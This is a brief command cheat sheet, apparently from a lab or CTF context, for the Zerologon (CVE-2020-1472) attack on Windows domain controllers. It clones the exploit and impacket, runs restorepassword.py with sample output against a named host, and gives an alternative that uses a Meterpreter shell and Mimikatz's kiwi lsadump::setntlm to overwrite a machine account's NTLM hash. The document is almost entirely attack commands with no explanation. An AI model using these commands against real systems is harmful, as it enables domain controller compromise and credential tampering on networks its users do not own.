1. sudo git clone https://github.com/dirkjanm/CVE-2020-1472.git

2. sudo git clone https://github.com/SecureAuthCorp/impacket.git

3. cd /opt/impacket

4. sudo pip3 install .

5. sudo python restorepassword.py <domain>/<hostname>@<hostname> -target-ip <target-IP> -hexpass <hex-credential>
	Example:
	python3 restorepassword.py MEGACORP.LOCAL/MULTIMASTER@MULTIMASTER -target-ip 10.10.10.179 -hexpass 076ded32a2510e506c97fcc197976732
	Impacket v0.9.22.dev1+20201112.141202.d1ced941 - Copyright 2020 SecureAuth Corporation

	[*] StringBinding ncacn_ip_tcp:10.10.10.179[49675]
	Change password OK

WORKING ALTERNATIVE:
SPAWN METERPRETER SHELL and LOAD MIMKATZ
1. load kiwi
2. kiwi_cmd "\"lsadump::setntlm /user:RESOLUTE$ /ntlm:076ded32a2510e506c97fcc197976732\""

